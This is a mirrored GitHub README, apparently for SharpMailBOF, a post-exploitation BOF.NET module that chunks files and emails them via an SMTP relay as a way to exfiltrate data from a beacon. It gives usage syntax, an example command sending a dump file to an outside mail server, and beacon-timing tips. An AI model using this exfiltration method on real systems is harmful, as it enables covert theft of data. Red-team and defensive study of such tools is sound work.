GithubHelp home page GithubHelp logo

gavz / sharpmailbof Goto Github PK

View Code? Open in Web Editor NEW

This project forked from xenoscr/sharpmailbof

0.0 0.0 0.0 8 KB

A BOF.NET program to split a file into smaller chunks and email it via a specified SMTP relay.

C# 100.00%

sharpmailbof's Introduction

SharpMailBOF

SharpMailBOF is a quick and dirty BOF.NET (Thanks CCob!) module that can be used to break a file into smaller chunks and email them as attachments to a specified recipient using an SMTP relay of your choosing. This can be used as an alternate data exfiltration method to speed up reciving large files when you are operating with a low/slow sleep setting.

Syntax

bofnet_init
bofnet_load [Path_to_DLL]
bofnet_execute BOFNET.Bofs.SharMailBof [SMTP_SERVER] [PORT] [RECIPIENT] [SENDER] [SUBJECT] [BODY] [PATH]

Example

bofnet_execute BOFNET.Bofs.SHarpMailBof mail.example.com 25 [email protected] [email protected] "Test" "This is only a test." "C:\Path\dump.txt"

Notes

DO NOT PANIC if your beacon does not call back. It will not call back until it has finished sending a series of emails + the time your normal sleep time takes. So if your sleep time is set to 30 minutes and you send a 30MB file, it could still take some time but, it will be much faster than trying to use the inbuilt download feature.

This BOF.NET module will delay checking of your beacon. The default delay between messages is 10 minutes and the default file size is 5MB. You can adjust this to fit your needs. At some point I may add the option to specify the delay and attachment sizes.

sharpmailbof's People

Contributors

xenoscr avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.